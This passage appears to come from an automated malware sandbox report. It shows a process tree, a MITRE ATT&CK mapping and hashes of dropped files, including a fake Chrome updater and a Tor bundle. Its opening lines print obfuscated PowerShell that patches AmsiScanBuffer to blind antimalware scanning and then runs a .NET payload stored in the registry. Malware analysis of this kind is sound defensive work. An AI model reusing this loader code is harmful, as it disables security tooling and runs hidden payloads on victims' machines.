nrApLnbgynHc).Invoke($NYuLZKDzYltFGetya,[uint32]8,4,[ref]$KUfbyMWiCG);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NYuLZKDzYltFGetya,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aqydCQWYThNPJHZMM,$rrcCWWAsxKnrApLnbgynHc).Invoke($NYuLZKDzYltFGetya,[uint32]8,0x20,[ref]$KUfbyMWiCG);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](100)+'i'+'a'+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+'s'+'tag'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:iGwuiAJbHGTp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WvgHUvQtlqYlUp,[Parameter(Position=1)][Type]$rDBrHcpUNZ)$oCTMIybYBzy=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+'c'+'t'+[Char](101)+'dD'+[Char](101)+''+[Char](108)+'e'+'g'+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+'yM'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'Del'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+'a'+'s'+'s'+''+','+''+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+''+'d'+''+[Char](44)+'An'+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+'ss'+','+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+'C'+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$oCTMIybYBzy.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+'i'+[Char](97)+'l'+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+'u'+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$WvgHUvQtlqYlUp).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+'e'+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$oCTMIybYBzy.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'Hi'+[Char](100)+''+[Char](101)+'ByS'+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l',$rDBrHcpUNZ,$WvgHUvQtlqYlUp).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+'i'+'m'+''+[Char](101)+','+'M'+'a'+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $oCTMIybYBzy.CreateType();}$EzTwuTUPnISxj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+'m'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType('M'+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+[Char](101)+'E'+[Char](122)+'T'+[Char](119)+''+[Char](117)+''+[Char](84)+'U'+'P'+''+[Char](110)+''+[Char](73)+''+[Char](83)+''+'x'+''+'j'+'');$lIeFWhcrgOGszT=$EzTwuTUPnISxj.GetMethod(''+'l'+''+'I'+''+'e'+''+[Char](70)+'Wh'+[Char](99)+''+[Char](114)+'g'+[Char](79)+''+[Char](71)+''+[Char](115)+''+[Char](122)+''+'T'+'',[Reflection.BindingFlags]''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+'i'+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WHsxAFYkhFiQLAiFUXO=iGwuiAJbHGTp @([String])([IntPtr]);$sSGirSMqgbKRGybDGOqaKC=iGwuiAJbHGTp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$TWotCZGqRIC=$EzTwuTUPnISxj.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+'e'+''+'H'+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')));$jVWwypGhmJOoEU=$lIeFWhcrgOGszT.Invoke($Null,@([Object]$TWotCZGqRIC,[Object](''+'L'+''+[Char](111)+'adL'+[Char](105)+''+'b'+'r'+'a'+''+'r'+'yA')));$bbHuzfDXrRHRtGgkw=$lIeFWhcrgOGszT.Invoke($Null,@([Object]$TWotCZGqRIC,[Object](''+'V'+'i'+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$lVtppQJ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jVWwypGhmJOoEU,$WHsxAFYkhFiQLAiFUXO).Invoke('a'+[Char](109)+''+[Char](115)+'i'+'.'+''+'d'+'l'+'l'+'');$ndZGfPrpockAhxfQX=$lIeFWhcrgOGszT.Invoke($Null,@([Object]$lVtppQJ,[Object](''+'A'+''+[Char](109)+'s'+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+'e'+'r')));$iPOBeeTqZB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bbHuzfDXrRHRtGgkw,$sSGirSMqgbKRGybDGOqaKC).Invoke($ndZGfPrpockAhxfQX,[uint32]8,4,[ref]$iPOBeeTqZB);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ndZGfPrpockAhxfQX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bbHuzfDXrRHRtGgkw,$sSGirSMqgbKRGybDGOqaKC).Invoke($ndZGfPrpockAhxfQX,[uint32]8,0x20,[ref]$iPOBeeTqZB);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+'T'+'W'+[Char](65)+''+'R'+''+[Char](69)+'').GetValue('di'+'a'+''+'l'+''+[Char](101)+''+[Char](114)+'s'+[Char](116)+''+'a'+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4724

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Executes dropped EXE
PID:548

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{1e696c66-d238-4853-91d4-24baf6e60919}
1⤵
PID:4820

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 452 -p 3044 -ip 3044
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:180

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
3.7MB

MD5
2633b7825a18e339d1c339a2475906e6

SHA1
a21077a1e5a72b9d8f9d4011d4b0cc659daf9cc8

SHA256
a3576399f5fb369a3ecbbabf804c4e8950eaccea304949eae965f2cf28e0219f

SHA512
14bd8873dbc3dd86bf743fa7927ec5adf9d4e78704181f33f849ef7c5d257588a3d96f2198b19d0fd69f5a7da67c3b610f37ceb8ec6e58da85df07be12025739

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
3.7MB

MD5
2633b7825a18e339d1c339a2475906e6

SHA1
a21077a1e5a72b9d8f9d4011d4b0cc659daf9cc8

SHA256
a3576399f5fb369a3ecbbabf804c4e8950eaccea304949eae965f2cf28e0219f

SHA512
14bd8873dbc3dd86bf743fa7927ec5adf9d4e78704181f33f849ef7c5d257588a3d96f2198b19d0fd69f5a7da67c3b610f37ceb8ec6e58da85df07be12025739

Download Submit
C:\Program Files\Google\Libs\g.log

Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERDAA9.tmp.csv

Filesize
42KB

MD5
859a9c17e08dbb205291168532fcf4c8

SHA1
f32a695b0a27e6bd61ccf9ef44570c1e0727ed0a

SHA256
6e17929e476cc15959e06cc7df3cee03a35fe8bd1d196e57588490584cabe3d3

SHA512
cbe831deac768ef9b0a094ea6f605bcc63e9e58db107bebf5d6c6303da54d8061e6425a6c4bfef734d58e1b19f92824ffef217176a9142ff09c674864e1a412e

Download Submit
C:\ProgramData\Tor\7zr.exe

Filesize
564KB

MD5
f86bb4469587005a6717649c9b160f70

SHA1
f229314ebbed02098a4adb33b706d68026d866fc

SHA256
5e47d0900fb0ab13059e0642c1fff974c8340c0029decc3ce7470f9aa78869ab

SHA512
a7881fe868c34124efa567b09274a885d05aef008914e5d341c4b8ead58451d1b29f4ace9782cd0c93d3c8fd1acb1f6e1e6cbb5b19cd51223295777b223c1366

Download Submit
C:\ProgramData\Tor\libcrypto-1_1.dll

Filesize
3.5MB

MD5
b7c32c8e7d21aa9b79470037227eba43

SHA1
38d719b10ca035cee65162c1a44e2c62123d41b4

SHA256
99b4042a858a9e437917c8256692e9ba161b87054ccf5e22538e86bb35c34f23

SHA512
d85345380b9605c8484e11873218aa4eaeea573ca51eedada6d0518695a2b184bb22faf7c5e3d88330935774ced17e9d80c577b06603aa1ca6dab748b0bd15a7

Download Submit
C:\ProgramData\Tor\libcrypto-1_1.dll

Filesize
3.5MB

MD5
b7c32c8e7d21aa9b79470037227eba43

SHA1
38d719b10ca035cee65162c1a44e2c62123d41b4

SHA256
99b4042a858a9e437917c8256692e9ba161b87054ccf5e22538e86bb35c34f23

SHA512
d85345380b9605c8484e11873218aa4eaeea573ca51eedada6d0518695a2b184bb22faf7c5e3d88330935774ced17e9d80c577b06603aa1ca6dab748b0bd15a7

Download Submit
C:\ProgramData\Tor\libevent-2-1-7.dll

Filesize
876KB

MD5
736443b08b5a52b6958f001e8200be71

SHA1
e56ddc8476aef0d3482c99c5bfaf0f57458b2576

SHA256
da1f75b9ce5f47cb78a6930a50c08397ee4d9778302746340f4057fcd838dbf4

SHA512
9dfcdb1186b089e7961767d427de986ad8e5f7715b7592984349d0b8e7f02198137c83e8c79a096a7475ad9f4695f52539fa08fa65912860ddf0a85515a7cda1

Download Submit
C:\ProgramData\Tor\libevent-2-1-7.dll

Filesize
876KB

MD5
736443b08b5a52b6958f001e8200be71

SHA1
e56ddc8476aef0d3482c99c5bfaf0f57458b2576

SHA256
da1f75b9ce5f47cb78a6930a50c08397ee4d9778302746340f4057fcd838dbf4

SHA512
9dfcdb1186b089e7961767d427de986ad8e5f7715b7592984349d0b8e7f02198137c83e8c79a096a7475ad9f4695f52539fa08fa65912860ddf0a85515a7cda1

Download Submit
C:\ProgramData\Tor\libgcc_s_dw2-1.dll

Filesize
668KB

MD5
36e1c3814bde3418ba3d38517954cb7c

SHA1
495e1ba5b0b442e70124d33daa6fea4e3e5931b0

SHA256
b34edd252f46dd881e79cfd274777fe5e90943d511c8e002aeca0528d7f3b4b1

SHA512
df7b608c51a782ad5cdfd753577a3dcacf4e2515ac02ce9e35b3cbc543895862844e8adcaff983b1348884085cf7427c33a67acc5ce48fe656f5b2083d0813b0

Download Submit
C:\ProgramData\Tor\libgcc_s_dw2-1.dll

Filesize
668KB

MD5
36e1c3814bde3418ba3d38517954cb7c

SHA1
495e1ba5b0b442e70124d33daa6fea4e3e5931b0

SHA256
b34edd252f46dd881e79cfd274777fe5e90943d511c8e002aeca0528d7f3b4b1

SHA512
df7b608c51a782ad5cdfd753577a3dcacf4e2515ac02ce9e35b3cbc543895862844e8adcaff983b1348884085cf7427c33a67acc5ce48fe656f5b2083d0813b0

Download Submit
C:\ProgramData\Tor\libssl-1_1.dll

Filesize
938KB

MD5
d92e59b71bf8a0d827597ed95b2eca42

SHA1
cfc49ff29eddb7127fbed166a8a1e740ea3dfb9a

SHA256
b6ef5cb4c093431f3e73c53e66df33d08237ba46d457d119a2c4dcae582314e3

SHA512
be65e003a498e753b08912d697e9b4d8a28828581c17d1e8e20880372a81030ce18610eeff230c8880e68a831041075bb2ebffcf318d29ebf58bc856fac3df04

Download Submit
C:\ProgramData\Tor\libssl-1_1.dll

Filesize
938KB

MD5
d92e59b71bf8a0d827597ed95b2eca42

SHA1
cfc49ff29eddb7127fbed166a8a1e740ea3dfb9a

SHA256
b6ef5cb4c093431f3e73c53e66df33d08237ba46d457d119a2c4dcae582314e3

SHA512
be65e003a498e753b08912d697e9b4d8a28828581c17d1e8e20880372a81030ce18610eeff230c8880e68a831041075bb2ebffcf318d29ebf58bc856fac3df04

Download Submit
C:\ProgramData\Tor\libssp-0.dll

Filesize
95KB

MD5
7cdbaca31739500aefc06dd85a8558ff

SHA1
adc36ec6a3cdc7e57a1b706c820e382627f6cb90

SHA256
0a1dee5dd5234971f7526f3d5f8b7e2cfdcb536e18debd51c985010fb504fbdb

SHA512
6df8ac9054f27ebbef9642ce79ff7ba836411ea0ed0bd04b3cfe724a336a91f665c2cc0b7a4bfc99a80786d1a6d361b971a7dbb7a298b919a1baa812541841ba

Download Submit
C:\ProgramData\Tor\libssp-0.dll

Filesize
95KB

MD5
7cdbaca31739500aefc06dd85a8558ff

SHA1
adc36ec6a3cdc7e57a1b706c820e382627f6cb90

SHA256
0a1dee5dd5234971f7526f3d5f8b7e2cfdcb536e18debd51c985010fb504fbdb

SHA512
6df8ac9054f27ebbef9642ce79ff7ba836411ea0ed0bd04b3cfe724a336a91f665c2cc0b7a4bfc99a80786d1a6d361b971a7dbb7a298b919a1baa812541841ba

Download Submit
C:\ProgramData\Tor\libwinpthread-1.dll

Filesize
301KB

MD5
07f4bbf18077231cb44750684dd8daf4

SHA1
8560627e9e05d6022abdfe7e576856e91ac90188

SHA256
4a146671b1fed4906799cb1cfc670753f1b1922793f5b40d5cf710befb287316

SHA512
04e31ad60e797cdbd1f3db36a8473139bbd1b763d2d67a160454b24b524e8bbc4d5784c62446a0f9d83b95dd518534ab4581d3a43a14146b17d0035ecc79c151

Download Submit
C:\ProgramData\Tor\libwinpthread-1.dll

Filesize
301KB

MD5
07f4bbf18077231cb44750684dd8daf4

SHA1
8560627e9e05d6022abdfe7e576856e91ac90188

SHA256
4a146671b1fed4906799cb1cfc670753f1b1922793f5b40d5cf710befb287316

SHA512
04e31ad60e797cdbd1f3db36a8473139bbd1b763d2d67a160454b24b524e8bbc4d5784c62446a0f9d83b95dd518534ab4581d3a43a14146b17d0035ecc79c151

Download Submit
C:\ProgramData\Tor\run.bat

Filesize
118B

MD5
68105dae4be9cd30404fb8e2602d6b41

SHA1
b6c84fe05e3cb369e3a0a9755e74e8cf7bfc5613

SHA256
b9396d305bb6b1ea0d6145fa953a0c832508a9536ef388814c04611473684f63

SHA512
a64983410bb3f08c17aee2d29ddbc57e853ab084876b8f60f6d22967be1a0042a09db64a613ac663b281def59f4132dec2bee7c46f88363b241437f18443d471

Download Submit
C:\ProgramData\Tor\tor.7z

Filesize
2.6MB

MD5
5e9bf4758a036f77e6e2c4d21476b398

SHA1
a6ea191f668abca2c02c0c2b909162eedc365eb6

SHA256
b277a6120a983b74843a25532bfbce759d000b46dd495bd8453bc3457a2076f7

SHA512
8f740b15cb991e8f86046e80efe8043472ffb05c3a75e97b62722c538208aa05477f3b0b85a8522a5964c874791b1e17464a6a750c58b1554b04f0e2c0ccda88

Download Submit
C:\ProgramData\Tor\tor.exe

Filesize
4.3MB

MD5
055ae7c584a7b012955bf5d874f30cfa

SHA1
f2b4d8c5307ff09607be929ec08fc2727bf03dcf

SHA256
d51b5bf807f6de3b5521b49b9a722592fb85aee1ea2f1c03bbb5255d62bfb9c8

SHA512
910bb0be7a3840bb37cb453ea066677a5327e272cfa0995f7a600bd4eb2e7c31685dcc0758c3b2cf07c7622fd45b2d4cdd3a4272cddaf9e97e2ffc48120646c5

Download Submit
C:\ProgramData\Tor\tor.exe

Filesize
4.3MB

MD5
055ae7c584a7b012955bf5d874f30cfa

SHA1
f2b4d8c5307ff09607be929ec08fc2727bf03dcf

SHA256
d51b5bf807f6de3b5521b49b9a722592fb85aee1ea2f1c03bbb5255d62bfb9c8

SHA512
910bb0be7a3840bb37cb453ea066677a5327e272cfa0995f7a600bd4eb2e7c31685dcc0758c3b2cf07c7622fd45b2d4cdd3a4272cddaf9e97e2ffc48120646c5

Download Submit
C:\ProgramData\Tor\zlib1.dll

Filesize
135KB

MD5
f08b1f044c68770c190daf1eb1f3157e

SHA1
f94103a542459d60434f9ddb6b5f45b11eae2923

SHA256
1d0278386f8922bdf4808861e6e901541ad23cc6337bb022c78dc05915202f27

SHA512
0667416a7515cd845e96d2ad26ca676cffd2d1c9f0449ff05455e8cf6a7ab595d3f972785d051f45332c04f1c0b576726f645e3669122608a4f374e984ba161c

Download Submit
C:\ProgramData\Tor\zlib1.dll

Filesize
135KB

MD5
f08b1f044c68770c190daf1eb1f3157e

SHA1
f94103a542459d60434f9ddb6b5f45b11eae2923

SHA256
1d0278386f8922bdf4808861e6e901541ad23cc6337bb022c78dc05915202f27

SHA512
0667416a7515cd845e96d2ad26ca676cffd2d1c9f0449ff05455e8cf6a7ab595d3f972785d051f45332c04f1c0b576726f645e3669122608a4f374e984ba161c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
4cc9e7069534f7bcbb90ad7cac69ed78

SHA1
a3522b9edd4a7d28ad0ac0e1b659a82b6dc10892

SHA256
4814be12fd2320cd9249d3b2611ea1421cb88823097fcbf0ca697e6e9ac93c9c

SHA512
e408e0abb3b7166578c075d10f1378d6a6b39dc386361a4df23abc026e9a634bfb16c01daf9b8fcbe8555e335d93c8c9d8442a11c187df616f2d6cdd3ab53653

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
80d63d622ca585f5cb44c09e39e403ea

SHA1
554e9c536b9009e457af8642267426f9aebebebe

SHA256
eea5ef00a9cc9172900f673bda4326fa7bc18684ce45922cdbd42a46f0b03676

SHA512
f4d4e43908e5c37609ad7b79a90ac293f86ed060f801c31ec94bbb1642753d67d44e250d2cff046b1cb18d2311465f9b600ebd570af2ef5a43ae447787b67b2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
80d63d622ca585f5cb44c09e39e403ea

SHA1
554e9c536b9009e457af8642267426f9aebebebe

SHA256
eea5ef00a9cc9172900f673bda4326fa7bc18684ce45922cdbd42a46f0b03676

SHA512
f4d4e43908e5c37609ad7b79a90ac293f86ed060f801c31ec94bbb1642753d67d44e250d2cff046b1cb18d2311465f9b600ebd570af2ef5a43ae447787b67b2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
b92282af9f5af8636553880c2ce1884b

SHA1
d4e4a04c65c16ea765849b07ecf5a6eb56735df8

SHA256
ce78dc07957c8ab1d7a89eba26041ddc4379374926de29e76038b099af6cfdd0

SHA512
a0ae4088b34d981d7191f74f0d81d1ab115cf61e6aa611041dbde0058381867c55fff840561ca3f3feb48aeacda1eb631f46b481d0eacefb28d354d08a5183e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
b92282af9f5af8636553880c2ce1884b

SHA1
d4e4a04c65c16ea765849b07ecf5a6eb56735df8

SHA256
ce78dc07957c8ab1d7a89eba26041ddc4379374926de29e76038b099af6cfdd0

SHA512
a0ae4088b34d981d7191f74f0d81d1ab115cf61e6aa611041dbde0058381867c55fff840561ca3f3feb48aeacda1eb631f46b481d0eacefb28d354d08a5183e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
643b1d05b430a6e6337f8206e4437230

SHA1
a07bac3ddf13cacd88054787a4f5bc50817e5f1c

SHA256
b53d0fd23c20b1f25a65bef2d1ea24076917b3ed218c0ae8ba303b4db28cd166

SHA512
cee1df01ddae5812d18cfd2241fe20b807db70a4e00fde4a469127df0e5884e2f37f2ea57dcb45317cbd48c4648be0c344175e4a799489f16f4f12ec0e452372

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
612b19feac3b60bdc771ec888769ea75

SHA1
cc0117dc3f83e139f22d7c9f068a0fa2027fc8fb

SHA256
3eb12f5e02a7aad8764186e1f62d9cebcc8667c854ebf4356fe404f042b84ec1

SHA512
2f56333015641eb11b853a350ca5a01763ab9fd2d572fca51ba2d7df3018546c9667a64ba670e443e0fef5c10879964bfe18084ae0b44e95cb17dcc864ffd4af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
80766ca93c2a2d55d2822de8018d8482

SHA1
37d195fc7dc10d58a01b8ef500eba02d18a98062

SHA256
7077256901c5ede000f4cae5a726b3d89db9b64665f8d3bbe07d827c7e46abdf

SHA512
b634265aee14a50cde87941d0d48eef6aa274c71b261ba111e008f6717222a06ccdf3b5d5133e2ef2ec0b67ec7f19e5aaf86d3fb8733e9f44a1c7c51e9fce80f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
b6692a4580a7f3c6ac77f944193ec28e

SHA1
7b4cf39bf3b4c36f511d7ad4deed5730e72cb21e

SHA256
783b4a3dc7b1abe65ca7385880b947f990157a435c6e274d2023aab905dbb8c6

SHA512
93baaa8d459565eb31dd752b4a0780f41feff28c8a599dc69df67521394e2a2527d0b74def460683ec3a2288e37b2a0998555238692e5d990b6563872f916151

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
a34aac4b891030effbb78bb7177f3a4a

SHA1
a2883f8b5f95ba7fbe5238a9fec76d2b72273ef2

SHA256
c85bf61bd4cf1822b076e5223dd9734f52598859a0ca871ecf51d8fc4e1f18e4

SHA512
c087e15519da0872459e94d5898688144954c44024ac14f0401c4bb45bf5bd7667d4501338d0c30701c8fd5be6d8e56434f63e440345d3c9fd7969de61c057c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
da7180677a7892d07310689b9932eb5c

SHA1
55f278630d78d4e441a2c5fccacede11a26561f6

SHA256
57ca075dbb78fa7ae73d5478327eebb55a6e3fff435945dcae15e12ed1a86313

SHA512
8abe95f7c943f056b21aeb5ba597bc8eea035c9480668408978bfbc22b5498c9007a95c430327e37511891394d1a9ad1e5da719df0a74ce1e75769d1f6e15b3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
a6f0012d71946959e63639dc26f74492

SHA1
4a4cf0541a4677080f7131ced70bb24ab599f6d4

SHA256
9838098a7ad6e735e6459980a7ac23932e79821ebb7f1acf3941944f045d3603

SHA512
6d0c07853201ea5cc611fcea0b8fd0d91f1d2a9481884e00b924df6daa688e7bf4e5d8343efa291efe660f0a383628f3fcae4e9faef755d2698d1b2b649c7f5a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
ac8e636af3a3f9dc8ff3f650ccd1c498

SHA1
d43bb9953e9d5583b6e56025197eaefae875728c

SHA256
1524039c8edfddaef3c5a9e11510a88dab3a2c6b251f0385724a95f9120bbc3d

SHA512
649d9d4a9d8e1e0304a7ad3712ef7ad3ecc7ccf21e454c36c992a651fc48156d37834cf4efea467c0dc745eadb6d13d60b19faf8e578d39d8016f87480778403

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
c89be2126dfc9614b4b0f4dfcdd438aa

SHA1
36bc4f175e714a1a07cb046d1985f2717a4f6daf

SHA256
5b2aa179ead5600dbce3ff7514d7b6d129fce578eb8238f0ae148cd80ecf711e

SHA512
184804bd4101a8a7fe948bf24cf50a8740e8e64aa2d767c2517c986d11f3195190eaafea91e4fa4215cc0eb700ceb517f13e12d2c6c8bb6c31cab0b4051275b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
493272cbf561ef32d2fbed255f86c5fb

SHA1
6c126bb28e3368674099418e22e35ee34adcbfb0

SHA256
a581c7b1b8abeb195b2747eaece14e46471a0c334754ae0eb886772c2016c7a7

SHA512
ca05a63b1c8969f17ad3471f53df09db029e4c8dcba57b377af648c2a96813601d9faf227a7f4cbb5918872bc15324353d97d8926f3fcd38d889ccf022d3c5a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
be50de36b87ab073aec87ec50ec89b41

SHA1
c8a1cc4a0a872fbeb107b9acc7f365f9154f9297

SHA256
2f1cabba0f73259ab40670b3cdc99532734cbdee0d1b088f3a2775395645f3a2

SHA512
8028be7c82b51c2416d04f84c911bced01a6edf6fc501808b4b8fbf700a73e8223efd7bfbeb0d8395144db8279eedb321487c6846ec3aa2fefce6f5e054c627d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe

Filesize
960KB

MD5
367dd476c0574f68f53020529c1b2623

SHA1
747d93ffd8afbe48203ac7b19b5c087072be6670

SHA256
efb4ed64cbd3ed0031b494d87402520f4401c47684539bb4a09fb8e02024085f

SHA512
c4e13af20acab668b84d0d22fd757fd56f2202555495dd038af8bce6f4630bcce3b834437214013e7710de28c8642d79b1315c4e33481bc71b4900972428f05d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe

Filesize
960KB

MD5
367dd476c0574f68f53020529c1b2623

SHA1
747d93ffd8afbe48203ac7b19b5c087072be6670

SHA256
efb4ed64cbd3ed0031b494d87402520f4401c47684539bb4a09fb8e02024085f

SHA512
